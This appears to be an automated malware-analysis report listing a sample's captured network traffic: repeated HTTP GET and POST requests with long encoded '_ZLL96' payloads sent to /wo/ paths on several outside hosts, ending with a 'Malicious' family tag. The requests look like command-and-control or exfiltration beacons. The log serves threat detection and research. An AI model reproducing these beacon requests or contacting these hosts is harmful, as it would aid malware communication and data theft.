Content-Length: 57160
Cache-Control: no-cache
Origin: http://www.employeevita.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.employeevita.com/wo/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

_ZLL96=1A6Oj9(Wz3Er3jqZ~_4isneviX(oPRorN7za~V33cdfTfMLT7nsf7dhW94AdAwF-tbl5bgsQmMmy8JEE5vEr06JNzBw8wTnxlUdjMccaZjyvxrAX(dVsEh0S2i8heLhdLcExmXXs(4L2df4u0TmHUxS7jYRIuS4_p0Tr7IadawYwmZFGOzTv5oyhhtKYXiIrT0pu31ddZHnx57jMeNYcSbmse4R_6vw7xQB6K35keDVLcbut5SrZH_Yk3L2HKuoqGInvrU18DGEd5f8oDQqT1aggkVTzQYAe3bT0~qPjhk81JkevqoJQGazaLIGGZJh2qp50liU5W3U3U60tBbw9t4bXe9Ne43Tfi2xxOJjKNEyMyd21K9G2xdyOxOFF(TzuwyXd6S7qU9PYDoByVG5_Jk5rzQz_Mv8oMKWgw7T1WzI_mbQqxV14V5NtRiUcVrBQa9(7DVkZJiMrEM(WyjbejzIQcPKFsaBuBya1ZcScIZp7HIvOCouS1lns9gDjEdFHjuicJgfNuK8uMeC86xdasO2N7GVnF9Md3aykdGsKgYWIceiO2C4056OYaxRzx8cK4QCQwiC4LmC2rv8DpUehpTHUEpZu2c448X~V2RuxgDGM(EL4Yi99fL4ZFejVc4ytSvIwtGuEkYjMKwe8GfqBLoNAXDsqZtT70UmwLNrhNxvQWhJsfJsFAkGHJkEsJHwU1TVtnSf9waCznc21GGILsEgJnuKMZ03KrzuPQSJUeiRwUhAGCwM-3fXobueGUlrU6QqMSdblyNSXkx7D98kz1o47g10itpJVXTl-veY9q-0LkaTpuDl1PwaaA2ujb7HYDEC4W-roxHGyAk9GJEJjmknzLqnrCImCQXmLJWQ-Pyrj4AhgG3E3zouNK2Mm3Vtujj~zuNnnLxTGqfnESGd8eupV~GgBgvXgoLb7wdVVrxR3BlW542OC3luruk9M6cl_xeObZwkz6f75yWY-kMQJsRrH7rN8xzJwq8MOrp~h2xidf6EkSM8QbhAgd5EzFG1Jfpl0HTa4DvmO3CcGTiWd1tgf2f8F0ZIxwIFKVYuvLxWoz-HUtHnViUZ35BqFAMKTIQkfKRgyr3f-PZ35RJKwnkOZIJJFwd0-xiFhCJ9J7k96aIE5qCW3ruK4StNO6oXcQECcuv5M(A(Zx6WJgMY3OTR5xe6HoDuuinoG2WMsrBXQvORK8t956N9OxdnOclSTkzKbIWaJkzmsRgJ1gdAuD_rwO9l9fcjNqEeedWQi5lL5EnGryaInIz9FvpvKud4LeyoBRGJWqutlb9750B~E8QTL~UYYa-ukrUZ24v(K2sFt7T2-qHzDGDI3gPjRTts4ovfSaqjj1GVYya~vbrq1hWRBxkC7f591ZiV_O30ZikfCwKHfvWL7ODSuJhlN3t9ek_l-I0ttTLNlHX5WSrkoRViyQcOSMsjPJVkImuEfY8~Rfd4ofiGP1Q60LvC6HWzwWaWR~pm_mPU9dCD4I0MB6lY3X8nnWZiP~UIWjrv5XTRkQMxFTH9pB6Qrm7e3yaJh5cBF3pLIpa1ooaY3sUcB7K4MIid0uDAYPQEJXEabO6r0uKak8cyVcN(wleQjNM(_wVErGhidyv3oi3lt3QUYy1ZbGLziL0XknYbGnNaUpfVPhCRYPEwwcZS_ETtBer9XpTcdjVHmNhI73BljQNRbSQNpiVbt2QDipHQ5Eh9IxJpT~F9mLKA2Icut2das78jmEmQBViMHiqh_6f6bxOCzl5yhBPdw4EEewdMM3FS1KlFRxcmtAFY3EHjTg4AcpWYMyHlh3yto9pj9EloMKPbUlwzelzrov4QCXjU6C2S9MrMl~5Knjqy5Lkhbb4utkKmaduDw0ZBkQgma(JmRrCylUUznVpNKGybo8x5R26e28dmexMtG48(IbBWKx6XETaFt25Kq~2P83gjOc_yvhQ~0~tCYdW5URdCy7FEx5C~rW6ra8JvYf33caaNdYZztjPHemOxwYs(4Dh7qN2hPShqTLd5Sc75q9Gsqdc1JiANay_H-ShV3yGz360Vv5uC8Q6jRN38LaKSg9clqk-Ty7gl8(xubg-aZCBd_(REoyqR4wa3itp3TjWVTiVY26jEwEncd6TrdM-FYlprhrgq-av84CtKdZEiKA6wyqzlK7IdrXrDMi4TtZNvVjzYKpWVkq_L2WdQL1Uk-D6oDlaev3UtI6CRTvzGW(SsRP7FKFWpnTxCyQW2BgQNw9CCjIxYhxBDSXrJQd0wS00jcxPsUFZWxc8iK7tNaGXpUFmq6v9~IVUCygEvXXFNgOaEDpb0NT4dFFYBrHwzIp9G5TNXhjLm91b0CK7(CPvSZMfP1y9sMn_hDkjfkPLG9yGGXyMHO6YevqP7BZWULpYwvxQMXLwZyzOM7qj0r(vCfKN

http://www.pq-db.info/wo/?_ZLL96=Odgi7Y7XPUYPi+s4cd6Y2J1SxIGI1CpSP1KZdAnTJe7ElOkUKQuUU5kS6GzKFYQs888Fg/mc&GzuD=WBjTZrcXj
  • Hostname: www.pq-db.info
  • IP Address: 62.176.235.43
  • Port: 80
  • Count: 1

GET /wo/?_ZLL96=Odgi7Y7XPUYPi+s4cd6Y2J1SxIGI1CpSP1KZdAnTJe7ElOkUKQuUU5kS6GzKFYQs888Fg/mc&GzuD=WBjTZrcXj HTTP/1.1
Host: www.pq-db.info
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.pq-db.info/wo/
  • Hostname: www.pq-db.info
  • IP Address: 62.176.235.43
  • Port: 80
  • Count: 1

POST /wo/ HTTP/1.1
Host: www.pq-db.info
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.pq-db.info
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.pq-db.info/wo/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

_ZLL96=G_sYl9eQeW84zqgcU6z_2dJJ59i7zm57KyjOdw3CPrHBnOcPKmy0MuB6~jDWfaQ88s4kvJXyZ1K4zcArVo~IPMB8UtAp9EelQLsGsHrLXsgyNwjxEmppBCCrUs(cBw1Rig8QcGrI(CGmqjLhdp5wIGf51FhjF9scZsXixt0YWT9FFVsgFRlV0v3Qr4n5HHLzP3JvEqfIZsW6cov-6GkI0GfNqv8Go2aU0rLncHfOZvKIlpMQh9~kDWD1HB~UiKBpdIgjJzN0EWdRYXBbS5d9zf(lNHVbl_HIHmmeZtVFmomyqmyMAprcJA9m6qYnQqlV920uLeEBtTFbxCN8PkvmXZTRq_l-XjIBIKGsMGMYZz6ke7qLNffMyfSSYuXoh8XLp0nFrhi_kbG3I8yb7eCsSpvnCv4b8eK0JzuMOAdSpGoAVcP47EiBtadyl959Wd3pwx8nha9NJGC4GX2SC-DTPlU6bWH4npkX(0~B2cxVoFCGue(k3Z7eM1nXj-Tf5XmVJIt_kPB3eALU6fp-c8DU8UZ3fb~CD0QuIvIA95eeI3hdHkpp5L9AJeb06tYHvlKZ9zfAaIX0SKhJZ-CO3Yet2FJgdzQ9sIRFU4gEIVoh8g5mVAQqLkavt-gzRUgTGSjeaP~l6xdWCH4yJutIGIjGWrwIdI0773SKjRcUpeaG7G1gmBTUiNNs9xO6vIAOzAU0fxh5~z4RDoClqZjHY2JfOPULX8sLUAoQmtWtCUfIauVEv3iru7ARqVWM3I74SAAIFF9SR_tF27DIajS2D3vV17ds(21Sp5ZnWq66dveTXSbQfXHizkjCqIjlLvuoiR9jw7X07Nq-RnblqA7FrLbE6JZIdDnovaDvV_NoxlStxFfak1ujDK5Gw8uu2IDI72Gco9vpqpiUaX188hXV1E5YlQKiyjRygcTr~S8s7SytDy658YcuUlcc6aEZzBTo~5t3ZPtw~mV2bOFuLun-cKVMpF32Tr5bCshfP_AcP_E2X8xOdblc1soHzgh0yqc-UjXNgPRAeBOlVCJUlalvFpW9hu0RZVMSkixJ7soQaF6eYEc1Jt(j64B5HTvcJpXYBjIdbw6R888qawlXVe1cbhduCtPOVTlnOX2B4p5E~aEmwaY-Xp5o7BNNhnF7H3UUtJRhzrVLYT4LRiw4LX5hyvKjMXnvNTU7TzqbrwligXiTxSHeHGqpahPLZnA85CoUxmpPlxdNd9I-E1eeGDZDjQM7r7Y5k9Wgp1fSvZiIf388yhFFekypi7ig(rnaPPqACNDCH8U2Zy3MhCwrxYqoI7fGXFb65uxjtnvOnV7nNLCdxbVGU7iLTFdETK9lgMOylHXfttFnFmcYYYvvQdcY3Whw1K6MtQe5KEeVSMI_0ZSqtybJ3tiGMlFbNMTOzkyuNS0trQbnMvEs4jaBsHzJs8Pwho0G0lnc6QBeDtZL8CqlethdP0SvcSowR_BTnwa7yY2eFLq0TyHsKfKpyaQdmVItYV0HSyAk(q(PglNyXv~qJ344l7U1fX1Siktro2AgoNmMb3j8XQnDjoH7MlcT7-m3dLiJdRoJg_QGLnp8hgyReT1Cz04HkP0K4s~oYtYYHjA66JuX7km3F_51pOQ095o7Lf0TgLTQJs7PqDNkJjdxpq6IAR8k(YdqQ2WI53VBw2ShWCJtzVQjbyy5U1b1aGn9LuOTrbRp1q9mqk7vy4ia5YuUF-bDO5BKNT8WOhWueG~YFrYrmv7ImySDNZPYwI1WUx8JSBL_41QcmLx-V0sO6XPY2VARzRQPxyA7DAcmojZkFIWqLfjvCVlxa_R_t-tEQMomSK4oKcHjsSww0XLGs119hChlgPRl3L8zsD0mgYJ3gNZGk3uLh1S2ui(0eaeMpZtRhMDCHIB7EKZoflfBXysim0MUvOjKbnj2XZWQpKc0G27dHvNacRqiQNe8nLZxo4MOWaratYkrUwurRLgd2KFiti3At1MaqHmrkTQv(1OvHj4PL2E3fCv83cJRnPmmVp2C4RC6TPc_butLKjiPfsdjYR32eEzLbwfCFTeKTGtjZAjnuJ(b2JwbU6f1GMglYFOiBUfvcvH5~sBKcofllJI-dTlR2rMBBxuQiCRoE9ruWJSIxJYrUlDekYX_oi9LPDpNXSE_KO5N9ErOL6bTejqvXwzxYMiZ2xo0rJcC9H~6KJjXjsWSrEvN\x00Ru7TxYP

http://www.pq-db.info/wo/
  • Hostname: www.pq-db.info
  • IP Address: 62.176.235.43
  • Port: 80
  • Count: 1

POST /wo/ HTTP/1.1
Host: www.pq-db.info
Connection: close
Content-Length: 57160
Cache-Control: no-cache
Origin: http://www.pq-db.info
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.pq-db.info/wo/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

_ZLL96=G_sYl_uEbm58544jZbjvsM4o3tuP6RdUV1XadxHGF-2MjvMPBEa_UeB52DDVbadLgO48vIDYZ1S7mIcyE-jKH8MFWt88sWmmQoQR6WTLcNUwIiLQI0N1OCupA9HVTAVKzywMKXL0oT~8miLFdKZ8N2L26ixlGadtVJ7M6NtCb2dLTWUeFUdgzvnlkfT0bFTNeklvXqniB-e0QIP28Rw18VXw~9kBy1Spzoz3BVy4br~6taV5hdKVE3yVAGrQje5dQqE7DyRPJExnXmgif-lLzvPfKAJb8enOAkesWtV-gsz9jGy4Ap~TKShQ(qY9dOQfrmsmC6BasmpbwnJVJmG3LJTKorJTBUowIKX7N2UYaxekbaaMLffM8PSQYuXeh8Xyp3HzkBq_mbK1JKn1se7dMZvrFrs726yMJ07PPhxSv28PEJrk5ViA5IBisdwmWd7gxwtGl7xcOGC3OGO7TM7XUkklElnDl5hw8Uq0171JvyKom-b0ysrkLADgpf(Hn1iAbZNFirhLJ1GZ7uZCMPPAiElmU5rBThZ8C6xSv560CRlJaRw2~5JXM_zl3_0Z60aY7CLHTca8XKsXIc3q07jO9GxEVzND05pdH5ZzDWVF7DMvYShtDUn_oco_fWkrOWffXL6j0zllHkAbBZg9Z6vqIcFgcYZL2XrgtSNIt9Puq153~AmJkepM5W7braJlwhsUeQZGqgEcB6ucmLf7G1UzL80-eM8DU3k9mte5CEbIZqVErw~ouccW4FWKoY67NwM6FH9wAPpFh4bOdiSwHkypx7d0zSlBkZ5WWoXtcvjmTQrfOjKK~EjFoq3ea_Sx(lAGwLTkgMGuAUy-9XnAgKfD~KRmcj76mP3Yaehm1Vi96gng9kLWFOtezN~F(pbTwyeJuO7ts9bgR0cwoCuA1lA9nUyJ9F4ynOa8pS186zWTNkCn25wEU1RZxbMSzzTC4YQ2IalrnXAvANpxKqGFYNd1oUOWTL9Hf8IfBodSDsFyVr8ef7sd9JYkrCQVxIRLFz(PsfUxWRueZx1xmNQeP5ig2Mk1XlAZhj1l~eo7VW63fXwEE_T1kZ8mLQyJJ_OIJigNTiyUn4NwbVApTqUnDQZGV_f_TCc7EwDM4rBu~7QmyqQ-V5Zoxghwvzc2EEA0g5UhmYBNa2NJS08lPV8nqaODHkTFIhY-dUy4tBwBmgu0xQXeEleWe13mIXh8~jQIx1hUyzJZbJheNgjJRRJg6nwEgOtunM78ohacgeygYyI38TB_SkKGtZ6X9bidCej1NtHDL-seRjzL1BIk8LmUCuXeM0Txv9ty0i34ikTgIoTj040vMJWsXXpocIo1g8u5sV7Fn9puLCUkA6SefeBB83Zcp5e13n2NXmKvc8sm07v2gGDS(_evTnVsOoOUjkSyBDo891jSB8ERhSqdhXn0vYzlp4oeq3zU3UdpINdjsjW3d_gIJmWcQhIeS_Af8wCv6aWeFLy4QiC2JMejyI5nhTUQPnEKZXUc2-eKpFwwAd6eFwkss8gbXH8nqBIws2sOs8iNLnHaVhvws6PfHUwT5PGaG4qbbyYF(-gkDFp4kgSZeRRBzVAx(PAN3sK5eZY2CANM(Jmc(VuDdexDmcY0pYk_C8gHupXabfTLhAlzakEU8KmiKiIorI9YfnSO6nsEhFq4SCF3y1VyWyG1C2z6em7WAvfw4LQu3LYArU(9y6zu4J~TF8LCE7BFNhsmSlTadAC-CKMLkMjM5EOiH73hyIlLakNiRy~y4XoirK9OT3Eb1GfKnzY73j4e3A1HFxF2uRpgNfHNcuv4AVRDT45ru8lXJckbf7hwL6WStTYuvETgw2NWk00WjP9k(7QxuhFyqIVypdxehwSMjH22lhH5OKaet5EIss26KcVfA-RSXnXyY3ZwxU0jvO7qCniJX_bnjolKNVP9ONwJXgWDTPW-uahx(J8ocLS4oboIZSuvHaJ93rRvvg3CjnpD8nC6ngB960iAPAIOEVITQ1n57YpPmOaresDV~zqeTP1jer1mAzvFT9knIyHrR1vidTjfNET5b3wcXg3at5KsxL9haeTXWf8mcV2zBnHNKcPZ~J4RDNi2rKcNVj52pewBJwqJkRlXNPL2BaG7y8ZXQBrBjeXb8Ch8CQ0LLlIdbZAm1VX_LcHIaEXtXXubB-KViRZUuewPzzqUVovTxYWH6Qe9wtByO_9D0JkFLXIv5h8mWpWoKHpQfLFqDtGeXv92nhy4NpifVPspBu4gLk9mZjSFwBc-atqXrM9Xeewi~m8t29GEYy9laoC6WczkRFIbRemrxT9u050F26HOtT6iV8X4~YT2mlrdiFlUsL7YncO4dcPA99kp9uHBOxh7RkwghLK9SsVWqDg7sjr_CRYf4jhz28cRe8Vmm9rqtbFJpcIZ1YVc02n-RQTnejfOlF3D

http://www.cnweikang.com/wo/?_ZLL96=O6MuYhT6wceiJ/j+9B9XHSKAaAuNOatlCnfAnNkQptIS5zQpIKNEDDuwDnZwxrX/qeVVNQr3&GzuD=WBjTZrcXj
  • Hostname: www.cnweikang.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /wo/?_ZLL96=O6MuYhT6wceiJ/j+9B9XHSKAaAuNOatlCnfAnNkQptIS5zQpIKNEDDuwDnZwxrX/qeVVNQr3&GzuD=WBjTZrcXj HTTP/1.1
Host: www.cnweikang.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.cnweikang.com/wo/
  • Hostname: www.cnweikang.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /wo/ HTTP/1.1
Host: www.cnweikang.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.cnweikang.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cnweikang.com/wo/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

_ZLL96=GYAUGE2Cs_KuQ4Xz12U2dF6cRlzaL6tBYBiwgf4zlJc05zYNFtZ_aj3pHS9Wha758cFKBWSD1S4DnEE1f5zrri9Pm2M91659it3TFke4VyCO7S44fCi4AwozkO7Idr0exOA0Xomqh6cDK_AgHDtR(a5ZHvhOTgyMwDBGhg25ZaybXZj30WOiloXDRzuhLcut9vv61but4qJsI5g0(tQtM3(Y~ldzsvq1ReZ6qZ1WA3Ku84uKsbGNDNF5n2XI(27qdEjjHOLW8UBSFhxljHLpmE6DIgR0LDc2VvF3vI4Wyxsasys0ybRdcX3KaZ0FRFjl37DwZS09fqvHe4FL9DDnfgQp2SpazK9_sMdXo2TBoUSJJCFV6LslBPomHeZAzZllRxCksCO_dnShuCg8ZCWmLZeOzxSrFwBOl-ZV3027Lkz2ZH~R7SbziDnGhUTqi041Xk2oofYWX0glty8B17BDW99kO-hpdvZgs8q7pQeEWukB(qQyTJ1i0-~_piWu8GsZGco8cFkFacZuwUbOpqDj4QykkGnNZtYCGO2lr1DEPbnT9y~KxrXVJ1DxXtUFUB7I2ZBDZN14s0HNZV632tv-2IKR0ynsGq1y~N2Pgpqz3wxDsj1IjYbPzQAmRWQOVDZJq2zU9pckkKcfFOmMosz3bcjlsT6YADDax0okeiV-aStTp9KL2_RZfC6mPDlDunwVlpng3tZiccKMoOCD7smLDEreAuK8~d~mjnndTaV2z8tt3GZGHsMx1AEymAR_d8kFdMXmdPoDxDRLWHH0DVI5ujctDo0zBTTHSrAfgSfOa1siqGJXftlMm6q0bqNmy_iknRpB7TDCjRguImjtH4DxacwSlWTna8PTxjtQ3mXUPhUzB6l1~poO(iYYzeKgBc2QL5i_8fc89Scw4gi4erjX3rIY7Tp7M7K1UNGTD2hMPTQ8lNAIEGa8H4SadjbhTZSZEn2ofyVfogfLQEmlDknx51Di7roIFC84raJ0ITXsqVlAFD3cDxKaRXyc~qdyTzkOQ3M2D5CQA5V9SaJ464qL~QEBt3EQn7quYTfKolO8xVTQjcWUmXtacGWwexbBUF3ziF7peu88HZ48ZKFMhZjNNACKVzV-S2zOzcnOoBIzUGYeCCrRElkdKd8yXihBXJXRDtVlfsEeJ5S6wt6j5-C_a-5PNV(QFeOE3T5sIegBkxTw5EfrgZhboXFdtZgwE8qkXEfyxsrJ(5bo4ozp3g70(TDp~win2aZ3GLWmMiTuVkTatNQA7HXY29jFxF3n8oDaHT~7CsYjXw9cbQY5D8D2fVTL6Gf_AdQbgIhFZ0UZC82OxMSHiJKwhuERxS3ZAjhfUuMgewPlb5D_hhAU2ElD(0dki3Y6fXq9vw4xoaWPvSa1AN3xFOZ2hOya5RmOo6E9ouNLlR3djqp1m_f_RwY6Q-a8j58EIk~r3I~md9XNahCGMnT3yAV0R3G7qxVJyOXqtP76lK2MfHpjMrXKJQ80cGMAUFGwDANhdTHWdmMwSfPru-IWqA4Oc22WT-rM4zsKeXfCksVdbImNSNF2F3OdhGQJfsbGTlmFujCc0Fgpo0jUkl8cDQ5gE63lCTmFxStrnIph8Unb57Z867Xdreyv2AzUEKpw24sjL78e9Vx-W5gm7GpEGi0qOGj2OsrvGuv9xiLQw2cp0iRYZDGJGkW-u6deDnb2UVdr(N~aF0FhVxWNNlt9WIj0S20xp0aWjEaIBLbhooIMVd6_1iiSP6FDWJJvVtw49ZaGZ8yeZMGdGHyQYo4zEXRBRhPMh5jkqUhpNP1G4oH0CGHeQhPKSOCVLjQjPUz5OOCzcAojs373oPo7oBR1nA6u6E0Yen4qc2qd3L5Q8XmVMPPTxPw7Vr(60WIlTCRgSnZlEzkzzb41O_nAhqi8S70zYt1P5_oXl7nUWKs9b7oUtcsrpI(hMDE3hyAQaK5YmxqKJ8Z7Rl7INe1x30KoVfoRNlG5GPEVtLejYZ2KhHGw8HsCVHYWoY~VIj2jkzSkuWnA(SvOjCsTM6k6tZGVFTzQdwF1AzJCYZJGkLehPPKj9n9mahzd(GxjWoSHUq0gltQG05tEP-u0eiUYQwvCndwomGWhNI(Req0aDUOQHHxBcriUojQbpTJo9ebDkyNXNaccC1h1qqnh9bH6kU9laOmnEfMf8PnFViCmQuJBR6bRBb6W\x00gzYQN_B

http://www.cnweikang.com/wo/
  • Hostname: www.cnweikang.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /wo/ HTTP/1.1
Host: www.cnweikang.com
Connection: close
Content-Length: 57160
Cache-Control: no-cache
Origin: http://www.cnweikang.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cnweikang.com/wo/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

_ZLL96=GYAUGGH7uPOFU6OLx08cTFKIa0jQGJN-GDaKgfI3vdYqoDINDrN0Uj3uPy9Jwq3B(P1CBXWl1SwcsFUwafn8jS4rk3ovx5R-svLfOBi4YiHI1gR7d26_fEMxqsqEU49IwtwoUtqWl7U-E-AYHhNN7rdWScdMTDmy8mtetAOQabGVVKbV0XbW(Ym3DTXXCKC9wIP63o(wg5xuWKYWyalVLE282EtoieKyCsBUkbZHNSuiyL22r7SWAYNEgxLR(nW6QhL7DvXD60lORkFdlmPxl0K9QTx0Fz80ZNtvro49iAEejStNybdrdgHgU50HMXHPnLbeXyFlfYXHeaNY5xr4VAQy7hR3kNF0sMMU5WbB5hKJOj1W87slU_okHeZIzZkJR3WgtD2_JUWjo0cMIkmCO5e401(8Bwt1l9oK51q7H1XxcnCK5Aj0qiSbo0bAi0k8WmfBv_kHQ0gi0RJLx-scQoBORtBSefdGtcOOpzPQVtgV0L1JFaEtzPOItjqA2U4yBM8Gak45S61kxnzupLH_x0zWvkjhetItD6jsqhKfH9jPzzCk0oiENROta70HQkfLwqBERY0yr0adekmi2PTcycyliC7nb7cVn8OFlK6SgH4ToRUbvo383y4qYQYmTitIj2DSj4gXz69_N4zzgtmQV_LVuDmxJWvJ1WkHUhwUNBhilJaTu_tpahDYMQcsuCkHtof1(qs3eN~t4PW_nMSgUGLvJeaK~tOfjnfBSqR2y8JtzB1HGNMy9wEwiARjFcondOm_HPsD5ThJXEv-EHVFgDcfFpIsQDz6StxejTi7e38t6SFbedlXnancSKAmvvyOkhscsTvonkM-N1LoCdrMedR1k2WgQtC_(H9WzVefBD0FK7ACud8GxFcz96v0XdDQEpSjs-IFpEY7zyqafKr5qbcjmjJ4NufiQ9~2RGEtGFB5vvUUEWGkDseZaTD9cdC_VkCrEGcWnwbURBCzHl(U~l6C6LscYWohlKo1KkawsGVhJB3KNkyxSlyu(MtMaxEIPFQOPpjgDu8VBdtEyuGj7iEMvhYxi5WCT0bxvH~Z3DeokpGC4zx-MUnVel~hdEvjgz3gV4BmB8dGUfV0qpHlLD(oWmosW1aBzd34plAzX2QeAQjRKB8OVfYgWVgUUYTmGqBnZKwBLPej0oTjx_K1es9xeXyfQtCRwjwTPo17k1rw~iHUm6VirW5K9r9vGsKJBm7YkMP3hNe5ooLayinLwm~-4Sn71pBEebqGfQLXV2GtqtIw6F(vr9nT5WnLwIH9c0KTWPFhPXRyZSUjEOf-M0qou0D2Mf8Tm4JCW1sQGd~26u2J2tWqpu4w8CWILxN7Qd4XVR7nD82MshkAiX4q7WoN8wgoeEvC4VIWp4GkrDGLJbzmJ6hBhrPG8C(VrN1nqsh20SG9vLcspvK3WTovI-vztbJBHlus9oCeLfDxd3i8J1L8zXITW3GQ9xNd9KnqtPjAsLGZewxTMb68OWZWaH0BTDLXAFsmbTTdXkJdT4z_n58wpwA8UXG8X_Xm(GcNbX6n0PluZ7eld-R2HDy76zMXePafXUW_ohCQjFBkoxLT9F1cKgNtL6joAWrm1zZWiIRqixbJg4Je2tTdmPuVtzWIb5t6kpsncONc6m82XJMyuDhiXjUIBXX8DvqxQ4y3gyez3WRKsxNUdVSGb0Kjm7sJEXbgX2RW~8DDF0NcSgGONn9-DM(3SD5r8lKviHCAKIrdqIoXTrmg~DeFN71aJblbeL5198GkafGUN_ThHzXPUbIdLE5QTXGvusHp6mxtUsBRv5ndAGCjchzXTN3PS34ofVr0Po6NbFE5lwHRx8MYt00EgFKvwwcCdGRMXnGsvp5i5VOSBezTgcpzDb6l(S8vai91WSsaSSIFiJQnObSSkbK9S_ZCed1t(cIbqd71P5Yjc_hH5dQWkqnjPzc3uwF5f455jw~xAcxZVFTBKJd0mG62cNdWIxrzG_8JoKiyFKaPukK-il4LA3NRpZSiBieHiifJuUmaw0vz1iwSS7d2vLafECuKSz4IQh47Ush-upSMOf(UwGYWegDj3FtiA_GoV5cezeZF1d9gCaeWJT4jNxCqt4sozRy0dIShZ5kSS2qZA303WvylrlAzzzkAzPfEoQ87F54uMkdcrM7Q2bnjrTJnCdeTY5cU84SvMy2BboANEOjqOOmfPSFKs6H_R6G2ChikSfUjm6gxMXh5rScsRlnIoBi5wPWl65gbEfqbI5dq8Qh5KS7Pi3OPBf3GtJDVEGDXQecW3Ofut7k_jV9AozyeFxtUwr9i0UvM~QS1uPQ3ppMREURlo5hxsQvKnpMGrdwCxxRESlw_JsD75oC54Y257HNecmMvkGFQskt_GA8nMSczc7aY~nQhoCXmi4D9~ICPBV4AzGPKAxW52mP

#infosec #automation

TheSystem Itself @ 2018-07-09 23:09:19

Detected family: #Malicious

TheSystem Itself @ 2018-07-09 23:26:02